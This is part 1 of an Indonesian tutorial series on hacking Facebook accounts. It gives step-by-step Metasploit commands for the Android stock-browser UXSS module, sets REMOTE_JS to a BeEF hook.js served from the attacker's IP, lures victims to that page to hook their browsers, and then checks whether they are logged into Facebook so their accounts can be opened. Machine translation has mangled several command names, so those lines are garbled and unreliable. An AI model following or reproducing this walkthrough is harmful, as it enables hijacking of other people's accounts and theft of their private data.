Cara Hack Facebook, Bagian 1

Selamat datang kembali, Sobatku!

Facebook adalah salah satu aplikasi yang paling aman di Internet meskipun itu tidak mudah untuk hack. Selain itu, sebagian besar situs-situs di Internet bersedia untuk menjual hack Facebook adalah penipuan. Jangan memberi mereka sepeser pun!

Jika Anda ingin hack Facebook, Anda perlu menginvestasikan waktu dalam pembelajaran. Jika Anda baru untuk hacking, Anda mungkin ingin memulai dengan posting saya ini.

Dalam beberapa kasus, kita mungkin mendapatkan password yang tentu saja akan memberi kita akses penuh ke akun Facebook. Dalam kasus lain kita mungkin hanya mendapatkan akses ke akun tanpa hak. Di skema lain kita mungkin mendapatkan cookie Facebook di tempat browser pengguna dan kemudian menempatkannya di browser kita untuk akses ke akun. Di skenario lain kita dapat menempatkan diri diantara pengguna dari Facebook dalam bentuk serangan MITM untuk mendapatkan password, dll.

Pada entri pertama di seri ini kita akan menggunakan cacat dalam stok web browser Android yang memberikan akses pada akun Facebook. Tidak usah dikatakan bahwa hack ini hanya akan bekerja bila pengguna telah mengakses ke akun Facebook mereka dari browser Android, bukan pada aplikasi seluler Facebook. Meskipun hal ini Google menyadari lubang keamanan di browser mereka, itu tidak otomatis ditambal atau diganti pada sistem yang ada. Kebanyakan hack ini akan bekerja pada sistem Android.

Kebijakan Sama

kebijakan yang sama-asal (SOP) adalah salah satu langkah keamanan kunci yang setiap browser harus memenuhi. Artinya adalah bahwa browser yang dirancang agar laman web tidak dapat memuat kode yang bukan merupakan bagian dari sumber daya mereka sendiri. Hal ini mencegah penyerang dari menyuntikkan kode tanpa otorisasi dari pemilik website.

Sayangnya, browser bawaan Android dapat hacked karena tidak memiliki menegakkan kebijakan SOP memadai. Dengan cara ini seorang penyerang dapat mengakses pengguna pada halaman lain yang terbuka di browser. Berarti bahwa jika kita bisa mendapatkan pengguna untuk menavigasi ke website kita dan kemudian mereka dapat mengirim beberapa kode berbahaya, kemudian dapat mengakses situs lain yang terbuka di browser mereka, seperti Facebook.

Bagi Anda yang baru untuk hacking, saya sarankan Anda mulai dengan menginstal Kali Linux. Kita akan membutuhkan dua alat, Metasploit dan Beef yang keduanya dibangun ke dalam sistem Kali Linux.

Langkah 1: Buka Metasploit

Mari kita mulai dengan menembakkan Kali dan kemudian membuka Metasploit dengan mengetik:

Kali> msfconsole

Langkah 2: Cari Exploit

Selanjutnya, mari kita memanfaatkan untuk hack ini dengan mengetik:

msf> platform pencarian: Browser saham android

Ketika kita sedang melakukannya, kita hanya mendapatkan satu modul:

tambahan / mengumpulkan / android_stock_ browser_uxss

Mari kita memuat modul dengan mengetik:

msf> menggunakan tambahan / mengumpulkan / android_stock_browser_uxss

Langkah 3: Dapatkan Info

Sekarang kita telah memuat modul, mari kita mendapatkan beberapa informasi tentang modul ini. Kita dapat melakukan ini dengan mengetik:

msf> Info Seperti yang Anda lihat dari halaman info, ini mengeksploitasi karya terhadap semua browser saham Android sebelum Android 4.4 KitKat. Ini memberitahu bahwa modul memungkinkan kita untuk menjalankan JavaScript dalam konteks URL.

Langkah 4: Tampilkan Options

Selanjutnya, mari melihat apa pilihan kita perlu mengatur untuk fungsi modul ini. Yang paling penting, kita perlu mengatur REMOTE_JS bahwa saya telah disorot di bawah.

Langkah 5: Buka Beef

Silakan lihat di tutorial ini menggunakan Beef, jika Anda tidak terbiasa alat.

Langkah 6: Atur JS untuk Hook Beef

Kembali ke Metasploit sekarang. Kita perlu mengatur REMOTE_JS untuk mengkaitkan pada Beef. Tentu saja, pastikan Anda menggunakan IP dari server berjalan pada Beef.

msf> set REMOTE_JS http://192.168.1.107:3000/ hook.js

Selanjutnya, kita perlu mengatur uripath ke direktori root /. Mari kita ketik:

msf> set uripath /

Langkah 7: Jalankan Server

Sekarang kita harus mulai server web Metasploit. Apa yang akan terjadi sekarang adalah bahwa Metasploit akan memulai server web dan melayani sampai Beef hook sehingga ketika orang menavigasi ke situs itu, akan memiliki browser mereka untuk Beef hook.

msf> run

Langkah 8: Arahkan ke Website dari Browser Android

Sekarang kita mereplikasi perilaku korban. Ketika mereka arahkan ke website hosting hook, maka secara otomatis akan menyuntikkan JavaScript pada browser mereka dan hook. Jadi, kita perlu menggunakan browser yang ada di perangkat Android dan pergi ke 192.168.1.107:8080, atau apa pun IP adalah dari situs Anda.

Langkah 9: Hook Browser

Ketika pengguna / perangkat mengunjungi web server kami di 192.168.1.107, Beef JavaScript akan menghubungkan browser mereka. Ini akan menunjukkan di bawah "Hooked Browser" explorer dalam Beef. Kini kita menguasai browser mereka!

Langkah 10: Mendeteksi Browser Apakah dikonfirmasi ke Facebook

Sekarang mari kita kembali ke Beef dan pergi ke tab "Commands". Di bawah folder "Jaringan" kita menemukan mendeteksi perintah Jaringan Sosial. Perintah ini akan memeriksa untuk melihat apakah korban dikonfirmasi untuk Gmail, Facebook, atau Twitter. Klik pada "Jalankan" tombol di kanan bawah. Ketika kita melakukannya, Beef akan kembali untuk hasil kita. Seperti yang dapat Anda lihat di bawah, Beef kembali kepada kita bahwa pengguna tertentu ini tidak dikonfirmasi ke Gmail atau Facebook, tetapi telah dikonfirmasi ke Twitter. Sekarang, kita hanya perlu menunggu sampai pengguna dikonfirmasi ke Facebook dan mencoba perintah ini lagi. Begitu mereka telah dikonfirmasi untuk Facebook, kita bisa langsung tab untuk membuka halaman pengguna Facebook.

Bersambung bagian 2!